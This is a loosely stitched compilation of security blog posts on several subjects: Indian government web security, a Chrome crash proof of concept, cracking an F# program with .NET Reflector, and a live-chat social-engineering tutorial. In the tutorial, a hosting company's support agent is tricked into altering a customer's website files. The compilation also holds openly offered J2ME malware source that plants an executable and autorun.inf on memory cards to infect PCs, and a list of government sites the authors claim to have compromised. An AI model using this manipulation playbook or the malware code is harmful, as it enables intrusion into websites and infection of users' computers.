It all began few years ago when our team hit a jackpot of web application vulnerabilities on various Government websites of India. Well. We did not know what to do about it. Being techies, we had little or no sense of bureaucracy involved in this sector. After a few days of calling up people and trying to explain them, we decided to go the Open disclosure way, convincing ourselves that this was required for the larger benefit of Nation. And there we stood at a press conference surrounded by reporters who had no idea what this was all about. And to add a cherry on the pie, the videos we recorded to demonstrate them would not play. Some problem with the media player. Finally one old gentleman asked. “What’s on the webserver?” And he continued… “so, you got inside.. well, that information is available even if I go and register on the site. What is so special? And with that information what can go wrong? After all they are just pages.. we get this info anyway..”

He had a point. But then how could I explain that a common man was not supposed edit details of things like tenders put up or send administrative mails that could impact a lot of people? It was a damp squid in the end. What we thought of as a major disclosure was shrugged off as weird teenagers wasting time.

Dejected, we watched these very Government websites being hacked over time during cyber warfares. Fast forward to present…

I read about Hackers Blog discontinuing their fantastic work. I am not surprised.  This month, on Friday the 13th (hehe), I went ahead on TV9 Channel and disclosed that BSNL website was vulnerable. Showed a webshell which was uploaded by someone and explained how dangerous it was for all their customers even to visit the BSNL website. They were informed almost six months back. I even met the right people in their head office to explain the problem. But the same question popped up again… “What’s on the webserver?”

On one side, our good ol’ politician Mr.L.K.Advani promises of setting up DSA, focus on e-governance, ensure broadband is given at every home and what not… and then we have our IT-ACT law amendment which was passed few months back without a protest. I can’t help but think… how much would our ignorance cost us over time?

rajsm meets Advani!

Here, I would like to mention a special body. It goes by the name of CERT. If you ask me personally, I would like to play Rambo’s First Blood with them. They never bother to reply to any of your incident reporting or e-mails. They just sit on it and wait for it to hatch. Truly. Try talking to them.

Someday when we have everything on the cloud, I would like to see what happens when a hacker alters medical records of patients, and the nurse administers the wrong dose after checking the portal.

So what can we do? What can be done? In my view… we are saving them millions on assessments by giving them free knowledge of vulnerabilities. On the other hand, since it’s Government of the people, for the people, by the people, then why don’t we have the right to test and know if our sites are secure or not? As tax-payers, what is the assurance we can get on security of Government websites that hold all information and details about us and our Nation?

Here are something’s that must change:

1. Government websites must adhere to highest standards of Information security. The webmasters maintaining them must be held accountable if they fail to secure their servers over time after being informed with all details.

2. Corporate companies with a business presence in India must ensure their best to rectify / resolve security issues once it is brought to their notice. It should be a legal offence if they fail to address it in given time.

3. Open disclosures must be legalized, encouraged and a process must be setup to effectively utilize it’s advantages.

4. The Police / Cyber crime cell must undertake and support programs and organizations that work towards greater awareness of cyber crimes among teenagers and school students.

5. IT Act Laws must be drafted / amended after consulting experts from Industries and must have more options to embrace feedback to adapt as needed.

I hope as responsible netizens, we take steps to ensure a safer future of the community in the coming years  before it’s too late. And not get to hear the question… “What’s on the webserver?” again.

By : Atul Alex Cherian. ( atul.alex [at] orchidseven.com )

Google Chrome completely crashes due to “Access Violation” exception if the user

right-clicks any file in the “Open File”  dialog that pops-up, twice within same tab 

or other tabs.If you select any file once, right-click it, & select any option…

then either click “Open” or “Cancel”…& try to do the same again, Memory corruption

occurs causing all the tabs & the entire Browser to Crash.

How to test this PoC:

1] Save the below code as an html file & open 

   in Google chrome.

2] Click the first “Choose File”, select

   any folder or file, right-click n select

   “properties”.Then cancel the “Open” dialog

    box.

3] Click the second “Choose File”, select

   any folder or file,& simply right-click 

   to see Google Chrome Crash due to 

   “Access Violation”.

——————————————————————

PoC Html file:

——————————————————————

<html>

<form name=form1>

<input type=file name=”aodrulez1″>

<input type=file name=”aodrulez2″>

</form>

Author : Atul Alex ( atul.alex [at] orchidseven.com )

      F# is another programming language added to the already

crowded .NET Framework.F# is promising though! It is said to

encompass functional programming as well as imperative

object-oriented programming disciplines.

      So far so good…. but the question that I have is…

Why mix it with .NET? Yeah…maybe .NET apps are easy to code

..maybe they are GUI-wise amazing…. Portable, since its again

similar to Java…all you need is .NET framework to run them…

& so on n on… but dear M$… portability comes with a price!

       There can be tonnes that I’d like to mention..but lemme

concentrate on only one such price that one has to pay if they

are tryin to achieve portability the Java way! And what am

talking about is “Reverse Engineering”..or rather.. I should

put it as “Ease in Reverse Engineering”.First, lets analyze the

“Portability Technique” thats being used here.

Portability Technique:

      The basic idea here is to have three major components..

1] Programming Language

2] Intermediate Form of Code.

3] Framework.

      Now how this works is simple.The Programming Language

is designed in such a way that when you compile it.. Machine

Code is not generated unlike rest of the programming Languages

out there… instead… its converted to an Intermediate Form

(ByteCode in case of Java & IL in case of .NET).Now a computer

can understand what to do only if its in Machine Language…

so its understood that this Intermediate Form is completely

“Crap” to the computer.This is where the FrameWork comes into

play… Each time you run such an application, something called

as J-I-T… Just in Time Compiler..is called in.This is a part

of the Framework & the sole purpose of this app is to compile

the Intermediate Form into Machine specific code & then execute

it.Benefit of this technique?.. u guessed it!… Portability.

      Okies, that was a pathetic way to describe the whole thing

but the sum-n-substance of it is correct.How is Protability

achieved? See… each time you compile an app in this Programming

Language… you always endup with Intermediate Form.This is

common for all platforms… Now its the job of the Framework to

make it work on a particular platform.So the only thing that has

to be done is to code a Platform-Specific Framework…n thats it!

All applications you code using this Programming Language can

run on all Platforms….for which the Framework has been

developed.

Downside?

      Each application that you code & compile is in the

Intermediate-Form.And what you distribute as an app is actually

this Intermediate Form of your code.The problem with this is…

Decompilation!

      Usually the applications coded in C/C++,Delphi etc contain

Machine Language Code.So we run a Disassembler on these & ultimately

end-up with the code of this applicaiton in Assembly Language Form.

Since goin through lots n lots of assembler code is really a

Head-Ache.. ripping out parts of your code & then converting them

into C/C++ equivalent code is a really tedious thing to be doing.

      Now the problem with our Portable Programming Language is

that…the Intermediate Language has got its own OpCode & since

this is not Machine specific..u cannot Disassemble this code.

What I mean by this is.. if you put it through a Disassembler,

most of the Assembly Listing that you’ll get will be bogus…

But thats a Blessing in Disguise! since this Intermediate Form

has got its own OpCodes, if we have detailed info about the

structure of this Intermediate Form, we can code Decompilers for

it!

Decompiler?

      A decompiler is a Tool that can go through a Programming

Languages’ Intermediate form & produce the actual “Source-Code”.

Yeah…u read it right…Source-Code! Most of the times, even

Variable & Function names are preserved!Its just like a

Disassembler..but also different in a lot of ways.For starters…

its “Programming Language” Specific.That means you can’t use a Java

Decompiler for an app coded in .NET .

      So,if a Programming Language uses this “Portability Technique”,

technically, a Decompiler can be written no matter how cryptic the

Intermediate Form might be.That sounds grave does’nt it? So whats all

this got to do with F#?? Everything!…..

      As i said in the Beginning itself, F# has been made .NET

Compliant.. that means…once compiled.. it’ll be in the IL form.

And there are tools already out there that can Decompile .NET Apps.

One of my Favourites is “.NET Reflector”.Its free, powerful, &

has got plugins too!

Lets Reverse an F# App….

      Since this is just a PoC Paper… lets code an App in F#

& try to break (crack!) it.Quick search over internet shows that

Visual Studio (.NET one) is needed to code apps in F# easily.

A little more tinkering around showed me that all you really need

to code an F# app is its compiler.you really don’t need to install

the overbloated Visual Studio to make our small PoC application.

Just Download the compiler, install it & you are ready to have some

fun.

Here is the Code for our PoC App:

(Save as Aodrulez.fs)

#light

open System

open System.Windows.Forms

let form = new Form()

form.Width  <- 170

form.Height <- 130

form.Visible <- true

form.Text <- “Aodrulez”

// Menu bar, menus

let mMain = form.Menu <- new MainMenu()

let mFile = form.Menu.MenuItems.Add(“&File”)

let mabout = form.Menu.MenuItems.Add(“&About”)

let miQuit  = new MenuItem(“&Quit”)

mFile.MenuItems.Add(miQuit)

let btn1 = new Button()

do btn1.Text <- “Register”

do btn1.Location <- new System.Drawing.Point(42,40)

do form.Controls.Add(btn1)

// TextBox

let textB = new TextBox()

//textB.Dock <- DockStyle.Fill 

textB.Text <- “  Enter Code Here.”

do textB.Location <- new System.Drawing.Point(30,10)

form.Controls.Add(textB)   

// callbacks

mabout.Click.Add(fun _ -> System.Windows.Forms.MessageBox.Show(“Aodrulez’s F# Crackme V1.0\nHappy Cracking!”,”Aodrulez”);())

miQuit.Click.Add(fun _ -> form.Close())

btn1.Click.Add(fun _ -> (if textB.Text=”Awesome” then System.Windows.Forms.MessageBox.Show(“Correct!\n “,”Aodrulez”);() else System.Windows.Forms.MessageBox.Show(“Wrong . Try again!“,”Aodrulez”);()))

#if COMPILED

// Run the main code. The attribute marks the startup application thread as “Single

// Thread Apartment” mode, which is necessary for GUI applications.

[<STAThread>]   

do Application.Run(form)

#endif

To compile it… save this as Batch file & run it:

———————————————————————–

@setlocal

@REM 1. Configure the sample, i.e. where to find the F# compiler and TLBIMP tool.

@if “%FSHARP_HOME%”==”" ( set FSHARP_HOME=..\..\..)

@set FSC=%FSHARP_HOME%\bin\fsc.exe

@REM 2. Build the sample

%FSC% –target-winexe -g Aodrulez.fs

@if ERRORLEVEL 1 goto Exit

:Exit

@endlocal

@exit /b %ERRORLEVEL%

———————————————————————–

Reversing F#:

      Okies..now that we have the Test Application ready.. lets see how

it works!

As you can see above…we’ve designed a GUI based application that needs some Code to be entered.It sure is’nt the one currently entered .If you have a look at the Applications’ F# source-code above… you’ll see that the actual code that the App is looking for is “Awesome”.So lets try that one….

         Yeah!..that was the Code our small little F# app was looking for.

Now this was no big deal! Anyone can reverse an App if you have its

Source-Code.So lets “Reverse Engineer” it the actual way….

Time For Some Reverse Engineering………………

 .NET Reflector:

      Am using .NET Reflector since I know that F# is already .NET

Compatible.So heres how .NET Reflector looks like:

Now am opening my “Aodrulez.exe” which is our Compiled F# App in

Reflector.Heres how it looks like then:

Oops! thats an Error saying it can’t find some file thats required

by F#. So just manually Browse & Select “FSharp.Core.dll” & Reflector

is all happy! So now we are all set to reverse F# using .NET Reflector.

      The above picture shows the Decompiled Listing of our App in C#

code… “.NET Reflector” simply works fine with F# too

Lets look for some more interesting code in our app’s Decompilation!

Are you seeing what am seeing too???? Thats my Code in all its Glory!

Its intact.. & I believe, even a 2yr old can understand that!

Patching F# App???

      Yeah..u read it right too… Lets try to patch this small app

of ours to accept any String as Valid code.. . For that we’ll use

one of Reflector’s Plugins called as “Reflexil”.

Reflexil Shows IL Disassembly as shown below which we can Modify as we

wish.

Lets modify that “brfalse.s” to “brtrue.s”. What will that do?

As you can see in the above pic, thats the conditional jump. So

what we are tryin to do is to make it jump to the “Correct! “

MessageBox no matter what Text we enter.( Note that here, the actual

code..ie Awesome will give me the “Wrong ” MessageBox! )

So lets patch it!

And now lets save this Executable!

I’ve saved my patched exe as “Aodrulez_patched.exe”. Now lets try

if our patch works or not

It sure does! Thats how simple it is to Crack an F# Application

Moral of the Story:

      As of now, F# is in its infancy I believe.But if its

.NET Framework Compatibility is continued, I don’t think it’ll

last for long.Why? Think of it this way….

      Suppose you own some Software Company thats developing

a new Algorithm… something that you just don’t want to disclose.

As long as you code your apps using this Algo in traditional

programming languages…its very tedious to rip your algorithm

& to reverse them.But lets say…you chose one of those .NET

Languages.Lets say F#…. when you compile your Application &

Sell/Distribute it as a Product, its as good as saying you are

distributing Pamphlets of your Secret Algoritm’s Source-code!

      As a Software company thats the last thing you want to

happen to you..is’nt it?

      So…Microsoft…Please! I think F# has a long way to go.Its

a really beautiful Idea in itself.Don’t mix this Programming Language

with your .NET Framework.

Disclaimer:

      This paper was solely put together for Informational Purpose & to point

out the weaker aspects of .NET Framework & the recently introduced F# language.

The author shall in no way be responsible for any damage caused by misuse of the

information provided here.

1. Introduction
2. Live chat
3. Doing your homework
4. What goes behind customer support?
5. Case Study – Executing the hack
6. What not to do on Live Chat
7. Prevention
8. Conclusion

Introduction

Instant messaging has changed the way we communicate to a great extent. To provide a better user experience and enhance sales, a lot of companies now offer support using the Live Chat. You can find it almost everywhere. There are numerous benefits – Instant support, quick resolution to queries, instant reach etc. But how safe is customer data when companies are providing support over Live Chat?

While there are a lot of psychological dimensions that apply to chat, instant messaging and other electronic communication forms, we will discuss the dangers of live chat and see how we can exploit it to compromise the security of an unknown website.

Live Chat

There are many companies who provide 24/7 Live support to their customers. Some of them include:

www.ixwebhosting.com    – hosting 350,000 domains

www.hostmonster.com     – hosting 450,000 domains

www.hostgator.com          - hosting 1,300,000 domains

There are usually three popular categories in Live chat:

1. Sales

2. Technical

3. Billing

Our interest is in technical live chat – simple because they will most likely have access to customer servers and applications. When you typically click on a Live Chat button, it may ask you if you are an existing customer or not, if yes, then what is your Cpanel (control panel) username and it’s associated domain name. But this is usually optional. Before you click “I’m an existing customer” to try something out, it is best you do your homework.

Doing your homework

It is always a good idea to test the live chat feature of your target hosting company as a regular visitor interested in some plans. Note that most of these live chat tools enable a support engineer to track your IP, visited pages and time spent. So it’s best to use anonimyzers than give away a large pattern of repeated visits and activity from a location. Always make Plan A and Plan B. If one of your strategy fails, you should not look lost while in conversation. Quickly provide alternatives to continue. Next, you should collect as much information as possible about the website you want to compromise. You can start off by looking at nameserver or DNS details using online passive information gathering tools. If your target is a specific hosting company, you can find all the customer domains hosted by them.

Some of the steps to help you get in started:

1. www.technicalinfo.net   – Gather details such as DNS servers, IP address, Admin contact, MX record details etc.
2. www.netcraft.com – Gather information about OS, webserver details etc
3. www.dnslocator.com – Gather information about domains who use specific servers, such as “ns2.hostingcompany.com” or “ns3.hostingcompany.com”
4. www.softbytelabs.com – Use Blackwidow to download the website offline- very Important. You will need to know the sitemap / structure of the website to get around.
5. www.google.com – ideally use google search to dig out information about the website. This can be right from the names of key people involved to reading blog posts of employees.

The above links are only to get you started. You can use any related tools for this activity.

What goes behind customer support?

Jokes apart, the pressure to deliver a high CSAT (Customer Satisfaction) score is intense among managers in support industry. Every time a call (case) comes in, the engineers are more worried about closing the issue on the same day (slam dunk) than cumulate it in their bins. Any customer who seems happy and satisfied in the conversation is a potential guy for a good feedback, which in turn will reflect on the support engineer’s performance review. So most support professionals are careful not to irritate or annoy the customers. Most support engineers will not be happy if you demand to speak to their direct managers for a technical case.Then there are remuneration issues. New guys are paid higher; some wicked sweet managers diplomatically don’t allow their best guys to progress. And most tech leads (TL) are not exact favorites. The last thing a support engineer would want is to get a low CSAT score.

Case Study – Executing the Hack

For this case, we have identified a domain (*******.net) hosted at a hosting provider (name / screenshots modified to avoid legal issues). We start the Live chat and select technical support. My comments are inserted as required.

Please wait for a site operator to respond

You are now chatting with ‘Zeyad Abed’

Zeyad Abed: Hello, my name is Zeyad, please let me know how can I help you?

you: helo mtr zeyad this is sarah

// a woman’s name always has a better chance of looking innocent //

you: i m trying to change the image but it givings me eror al time

// the spelling mistakes are intentional. //

you: from FTP

you: it says cannot rename folder

you: but im able to see everything

you: why?

you: hello?

Zeyad Abed: Provide me your domain name please

you: ******.net

Zeyad Abed: Hold on please let me check it

You: its header .gif under images folder im unbale ti rename it

you: i have new update byut its not gettng copiedand keeps giving me error “connection tiemed out”

// the intention is to give an impression that I’m a dumb user – if you notice; there are no “full stops” to separate the sentences. I did not want him to pause and think over a sentence and then move on to next //

you: we have to update zonal lead changes today as after saturday on monday the customers will start updating it

you: hello?

Zeyad Abed: Yes im checking now

you: okies

// smiley to make the conversation a bit light //

Zeyad Abed: Thanks

you: damie use ‘sarahmon321′ as pass n lemme kno ok?

// I type in a message that seems like it’s for a ‘trusted’ friend – as it contains a general password – This move has numerous benefits. Although it seems like a genuine mistake, the vulnerable position distracts the support engineer. This also helps in gaining trust //

you: oh sorry it was not for you

you: mistake

Zeyad Abed: It’s ok

you: i hope u wont use it on my email

// this re-enforces my vulnerable position. He can access my mail if he wants to…//

you: too many chat boxes got confusd

you: you also facing the same issue?

you: i think something is wrong on the folders? that image is locked or something?

Zeyad Abed: Sorry , just give me a minute please

you: ok tk ur time

Zeyad Abed: Sorry the pic in your main page?

you: yes its on the main page u can see? above the image of hands?

you: clock sorry

you: pls dont delete that im only truing to rename it for putting new one

// stating not to delete the image makes you look genuine //

Zeyad Abed: Sorry all the pic in your site working

you: so what to do now?im unable to relpace it

Zeyad Abed: Sorry form your side you can’t see the pic in your main page?

you: arry i can see it…

you: its not that i want to rename it frmo FTP so that we can replace with new image its not taking it

you: its not geeting overwritten

you: its not getting replaced

// I typed too many sentences and looked desperate. I thought I was losing it. This was a mistake in my view. //

Zeyad Abed: Sorry but you can replace it go to your webshell please

you: waht is that?

// If I agree to webshell, this conversation is over. It’s best I deny any knowledge of it to buy more time//

you: they have given me ftp password root

you: to update the site

you: can i do it from cuteFTP?

// this makes me seem like a restricted user who has been assigned a job //

Zeyad Abed: Sorry i mean your FTP

you: yes thats waht im telling you

Zeyad Abed: Sign in t oyour FTP

// good, I can drive this again //

you: im singned in ftp and inside images and see all files n folders

Zeyad Abed: Ok

you: ok can you try from ur end? any other image can u rename successfuilly? are u sure its not server issue? as i can see everthingh inside?

// ok, now we are on the same page. I only ask him to replicate the issue and check if everything is all right. This is as harmless as it can get //

Zeyad Abed: Which image you need to insert ?and where exact?

// It’s on the right track… Time to gently put a bit of pressure if needed //

you: can u try renaming *****logo.jpg?

you: its under images folder

Zeyad Abed: Ok

you: or any other image and tell me f its working?

Zeyad Abed: Ok

you: its not right? i told u…

// ‘ I told u’ is such an old game… //

Zeyad Abed: Hold

Zeyad Abed: Hold on please

you:

// the sad smiley is the last nail in the coffin. //

Zeyad Abed: Rename it to what?

// my job is done //

you: .bak? for testing?

Zeyad Abed: bak?

you: its acce.bak —> backup

you: i dont want to delete any image in case i want it later

you: just renanme it to .bak frim .jpg n see if ts accepting there?

Zeyad Abed: Sorry i need to rename sklogo.jpg to which name you need it ?

you: sklogo.bak

you: or *****logoold.jpg

you: anything

you: working?

Zeyad Abed: Ok

you: its working?

Zeyad Abed: Yes it’s working now

// Bingo! //

you: ok leme se

you: see?

you: wait

Zeyad Abed: Take your time

you: hey how did u do that? what steps did u take?

// Rather, WHY did you do that!”

you: just cliekced on rename?

you: wow its working

Zeyad Abed: At first you must to click in your file which you need to rename it and then rename it

you: ok.. ohh.. .. leme try and get backl to you… ill test it again and let u know

you: zeyad u beeen an angel i was breaking my head almost

you: thank u!

Zeyad Abed: You are welcome

you: thanks again

Zeyad Abed: Is there anything else I can assist you with?

// they are so nice //

Zeyad Abed: You are welcome

you: i will try this n update rigte now! im so happy i can have my lunch happily

you: thanks to u. good day zeyad

you: tk care

Zeyad Abed: Bye

Zeyad Abed: Please feel free to contact us if you need further assistance, we are available 24/7.

you: sure! goood day!-

You can see the result below

websitehack-before

There could have been a number of possibilities. Imagine a scenario where we could have asked the support professional to rename a critical folder (like “images” or any database or system folder). Or worst, rename Index.html to index.gone!

What not to do on Live Chat

1. Ask to delete any data

2. Reset / Change passwords

3. Make the the chat professional uneasy initially

4. Appear too desperate

5. Give your real name / number or e-mail id

Prevention

Some of the easiest ways to spot a fake conversation is to observe the language. The hacker will likely make a lot of spelling mistakes in order to sound like a genuine user. The questions can be too dumb at times. When a user has an access to FTP root, (s)he knows what to do with it. The support companies must make sure they do not modify the contents of a website in anyway. Not even rename files.

Conclusion

I hope this has given you an idea about the dangers of Live Chat and how they can be exploited to compromise the security of a website. Any feedback will be appreciated.

J2me Background Info:

          J2me is a “Stripped-Down” version of the actual Java that runs on our Computers.This variant of Java is usually implemented on Handheld Devices & Mobile Devices… such as Mobile Phones,PDAs,Smart-Phones…you name it!

          If you’ve ever played JAVA Based games on your Mobile Phone/Device..youalready know how it looks like.All java based games & applications that are available for Mobile Phones belong to the “J2me” technology.

Technically… this is how the Propagation work

           Lets consider a simple Java enabled Mobile Phone.Now-a-days almost all mobile phones have got “Memory Cards” so that its storage capacity can be increased.And well…When you connect these kinds of phones to your computer to transfer your Multimedia files & other such documents,this is what happens:

1]Almost all Mobile Phone Brands when connected to PC, if they  contain a  Memory Card, make these Memory Cards availble as “Removable Storage Device”..just like what happens when we plug in a Pen-drive to our system.

2]Even if a card reader is used, the story is still the same.It still gets detected  as a New Removable Drive.

And this beautiful Feature is what I’ve thought of Exploiting to Propagate a Malware.

How?

We’ve all heard about “Autorun.inf” based malwares…. hav’nt we? Hmm…thissounds interesting!

So..if we could achieve this:

1] Some-how if we could dump a Malware & the corresponding “Autorun.inf” file(u guessed it! to execute our Malware!)..Windows should take care of the rest for us!

Now comes the most interesting part…..

 Can we achieve the above objective using a Mobile Phone Based J2me Application/Game?

 Apparently….Yes! We can make a simple Mobile Phone Game/App that when run on the Mobile phone can infect the “Memory Card” & subsequently the PC with a “Windows”  based Malware!

How on earth is it possible?It can be done like this………

1] Create a simple J2me application/game that contains both our Malware as well as the “Autorun.inf” file as “Resources”.

2] When this application is run, it extracts these resources & places it in the ”root” of the Memory Stick.

3] That way when the Mobile Phone is connected to the computer next time, this Malware might possibly be executed.

Benefits of this Technique of Propagation?

1] Its quite easy Technically to take almost any J2me application or game and embed a Malware & an Autorun.inf file & add a simple “.class” module which does the dirty work for us.It can be done in such a way that even after our modification, the app or game will look & work just fine.

2] As of now, no Antivirus Product or Any other such Anti-Malware product is capable of scanning Applications or games “installed” in a Mobile Device.Its going to be very tough to scan it this way because different Brands & even different Models of phones use different techniques to store these games & applications.

3] J2me applications come with a “.Jar” extension which is nothing but a “zipped” file.Thus no need to use packers in our Malware as “Size” is already taken care-of by J2me Technology!

4] Even if the “Autorun.inf” & Malware are deleted from the card… next time u run this game or application on ur phone, it’ll be generated again..n again…unless the infected mobile game/app is deleted from the Mobile Device.

5] Even Rootkits can be technically Propagated this way!

6] Now-a-days almost all Mobile Devices support these (Java is Portable!), so the Impact can be very High!

Drawbacks:

1] Different technologies are used by different mobile Devices’ Manufacturers.So it’ll be a lil bit tough to create a Malware that avoids detection & still can work equally well on most of these brands.

2] Well, we all know that decompiling a “.class” to its actual “.java” file is no big deal…so it’s very easy to detect these too.

3] J2me apps when trying to access Phones’ filesystem, need the user’s consent.But since everyone of us is fed-up of this feature, people just click “yes” all the time!

   But intelligent coding is required so that the alarms raised are as minimum as possible.

Proof Of Concept:

            I’ve coded a Proof Of Concept J2me Based application that when installed & run by a Sony Ericsson Based phone, Infects its memory stick with a Simple Windows executable (Not malware!) & the corresponding “Autorun.inf” file.This phone then when connected to the Computer, infects it!(successfully tested).Since its hardcoded for SE phones,modifications are needed to make it work on different Brands of Mobile Phones.

          So that clears all doubts regarding the “Pratical Usage” of this technique.

Ending Notes:

            AV companies..watch-out! its goin to be a tough time ahead..with all these Mobile Devices around! This Document & the corresponding PoC were developed & published for educational Purposes & for warning the Security Professionals of a possible new way of Malware Propagation.I am in no way Liable or Responsible for any kind of misuse or harm caused due to the Information Published here.

PoC Code:

package aodrulez;

import java.io.*;

import java.util.*;

import javax.microedition.io.*;

import javax.microedition.midlet.*;

import javax.microedition.io.file.*;

import javax.microedition.lcdui.Alert;

import javax.microedition.lcdui.ImageItem;

import javax.microedition.lcdui.TextField;

import javax.microedition.lcdui.DateField;

import javax.microedition.lcdui.StringItem;

import java.io.DataInputStream;

import java.io.DataOutputStream;

import javax.microedition.io.Connector;

import javax.microedition.io.file.FileConnection;

import java.io.IOException;

import java.io.PrintStream;

import javax.microedition.midlet.MIDlet;

import javax.microedition.lcdui.Displayable;

import java.util.*;

import java.io.*;

import javax.microedition.io.*;

import javax.microedition.io.file.*;

import javax.microedition.midlet.*;

import javax.microedition.lcdui.*;

import javax.microedition.rms.*;

import java.lang.String;

//Normal J2ME application’s structure.

public class Virus extends MIDlet{

byte [] viruscode;

public Virus()

{

}

//Am not creating any UI …just do the job n exit!

  protected void startApp() {

  try{

  viruscode=loadResource(“/malware.png”);}

 //malware.png is the name of my Windows Executable(can be Malware!) added as

//resource to avoid suspicion.

  catch(Exception e){

  System.out.println(“Error!”);

  }

       saveFile(“file:///e:/”,”exyiv.exe”);

// e:/ is the driveletter assigned to memory stick on Sony Ericsson Phones.So

//extracting the file to its root!

     try{

             viruscode=loadResource(“/autorun.png”);}

//autorun.png is the name of my Autorun.inf File added as resource to avoid

//suspicion.

  catch(Exception e){

  System.out.println(“Error!”);

  }

       saveFile(“file:///e:/”,”autorun.inf”);

        destroyApp(true); //Kill the app…since the phone is infected!

    }

           public void pauseApp() {}

           public void destroyApp(boolean condition) {

       notifyDestroyed();

   }

 //This is the function that extracts resources from the j2me app’s resource folder

//into a Byte array.

   public byte [] loadResource(String resourceName) throws Exception

{

byte [] returnBytes = null;

try

{System.out.println(“Attempting to load resource: ["+resourceName+"]“);

InputStream ins = null;

if ((ins = getClass().getResourceAsStream(resourceName)) != null)

{

ByteArrayOutputStream baos = new ByteArrayOutputStream();

byte [] nextByte= new byte[1];

 while ((ins.read(nextByte,0,1))!=(-1))

{

baos.write(nextByte[0]);

}

if (baos.size() > 0)

{

returnBytes = baos.toByteArray();

System.out.println(“Resource ["+resourceName+"] successfully loaded. (“+baos.size()+” bytes)”);

}

}

}

catch(Exception e)

{returnBytes = null;

e.printStackTrace();

}

return returnBytes;

}

//this is the function that saves a file to a particular location we specify using the

//”Filesystem Api”.

// We’ll call this to dump our malwares to the root of the phones’ memory Stick.

  private void saveFile(String path, String name) {

        try {

            String url = path + name;

            FileConnection fconn = (FileConnection)Connector.open(url, Connector.READ_WRITE);

            if (!fconn.exists()) {

                fconn.create();

            }

            OutputStream ops = fconn.openOutputStream();

            ops.write(viruscode);

            ops.close();

            fconn.close();

        }

        catch (IOException ioe) {

            System.out.println(“IOException: “+ioe.getMessage());

        }

        catch (SecurityException se) {

            System.out.println(“Security exception:” + se.getMessage());

        }

    }

}

Reliance BIG TV XSS

Let’s look at some of the problems we face:

1. ATS : Wrong focus?

While it’s a common knowledge that terrorists use the Internet for communication, and target Indian websites to highlight their cause, The Anti-terrorist Squd seems to focus more on tapping mobiles, Intercepting GSM networks and voice-privacy solutions. The reality is, even though these do help, they are ineffective means of tracking terrorists. Talk about Internet / Web security or Digital Forensics, they give you an odd look. Techies are still insignificant people in front of their “real” world of guns and bullets. Besides we always have the Cyber Crime Cell in Mumbai to put the blame on.

2- Cyber Crime Cell, Mumbai : Cyber What?

I don’t mean to be rude, but it’s practically a glorified department. Even tracing an email is a challenge. But more than the technical incompetency, the larger issue is attitude. A few intelligent people who know a few technical things prefer to keep mum. Their reason – Why open your mouth and invite more work? The complex unsaid ego and divide between “senior” and “junior” officers ensure that sensible work or process never get’s implemented.

3 – NTRO : Making the right moves

NTRO is one organization i personally respect a lot. They have made decent efforts to bridge the gap between various agencies over time. With a strong technical team, i feel they are quite equipped to handle Cyber Crime related issues. But again, they are not directly involved or are responsible to tackle it.

4 – CERT India : A big joke

I don’t know why we have CERT India. What is it’s role? let’s see what they say about it:

http://www.cert.org.in/incidentreporting.htm

“CERT-In will then analyse the information provided by the reporting authority and identify the existence of an incident. In case it is found that an incident has occurred, a tracking number will be assigned to the incident. Accordingly, the report will be acknowledged and the reporting authority will be informed of the assigned tracking number. CERT-In will designate a team as needed.” … and Blah Blah Blah.

Here’s the truth. CERT does not have any system for Incident Reporting. Even if you report an Incident, they won’t respond back to you. In August 2006, we reported close to 40+ Government related websites (Including the president’s) that were vulnerable to hacking. We gave exact links, documented proof, video’s (yes, even recorded videos!) and screenshots. This report was also sent to major news channels. What happened? Nothing! With anguish, we could only watch our Indian websites being hacked over time.

NIC : Helping Hackers?

Almost all government related websites are developed and maintained by NIC. And almost every website has a host of vulnerabilities that a defacer can take advantage of. I wonder why NIC does not have a decent security training with all that money from the Government? With e-governance on the rise, it will be dangerous if Indian Government does not take a serious look at lack of Information Security awareness.

So what can be done?

I think the Government must move fast towards gearing for Cyber warfare. This is where the real battle lies. With the vast confusing mesh of departments, it’s best for the Government to seek some professional advice. Here are some suggestions:

1. Acknowledge Hackers and work WITH them. Encourage Open Disclosure.

2. Support Indian Hacker groups and community.

3. Facilitate Cyber Crime awareness in Academics. Utilize local youths as volunteers for solving cyber crime cases.

4. Make it mandatory for all lawyers to upgrade their technical skills and awareness of Cyber Crime.

5. Consult the corporate before drafting or making further ammendments in the IT Act Law

6. Understand the importance of Training and impart the same to the right people. And not expect it to be delivered free by some company.

7. Establish cooperation between different agencies for faster resolution of problems.

Open Disclosure – Hacked Websites (Not in NEWS yet)

Here is a small list of websites.. that were hacked / compromized by the team and notified to the Cyber Crime Cell / Government but nothing has been done to rectify it:

Passport Office Chandigarh

Tata Memorial Hospital

Ministry of Information and Broadcasting

Dept. Of Education – Govt. of Rajasthan

official website for Eastern Railway

BSNL – Dotsoft Development Center

Ministry of Defence

Prime Minister of India – PMOs Office

Directorate of Public Grievances

Central Information Commission – CIC

Central Vigilance Commission – CVC

Election Commission of India

Maharashtra State Police Website

Directorate of Technical Education Maharashtra

Mumbai Police

The Singareni Collieries Company Ltd

State Information Commission – Himachal Pradesh

NIC – Project Progress Monitoring System

Public Health Engineering Department

Tea Board of India

This is only a partial list of vulnerable sites. Feel free to reach us for further information (concerned webmasters can contact for free resolution / technical support of the issues).

www.ndtvprofit.com

SQL Injection / Attacks

SQL – Query

Image–> www.ndtvprofit.com
- rajsm

orchidseven

In first part of this series, we will look at how we can use religion and occult science to exploit people and use it to our advantage. It is easy to slip into debates related to religion and global issues, so we will focus on how to use the “art” to exploit a specific target with some examples and case studies. The subject itself is controversial in nature, so it’s best we kept aside the moral values and ethics for a later discussion.

Overview of Reality Hacking

Before we start, lets understand what hacking is and what a system is. Most people say, ‘hacking is about stealing passwords and getting the root’… or something similar. And a system is any computer or network which we want to hack. But in true sense, hacking is not just about passwords. It’s about improvising a process or taking advantage of a system as a whole. A system consists of people, process and technology. So, even the entire company is a system. The way nature operates is a form of system. Even the way you do your daily routine and spend time with your family is a system. And hacking can be applied just anywhere, by studying it carefully. This view is generally known as reality hacking, and is similar to the final climax of Matrix, where Neo finally believes in himself and sees everything, including himself as a part of Matrix.

Occult science in everyday life.

How many times have you read or seen people reading the daily astrology column in newspapers? or, how many times have you shown your hand to a common friend or a ‘hand-reading expert’ to know the future? How much of it do you believe really?

Some examples:

In India, almost every marriage is done only if the “stars” match. You would face considerable resistance from old grannies and mothers in getting married to the girl you like, if the ‘kundalis’ do not match. Imagine, a small astrological chart can actually determine if your family approves your relationship or not!

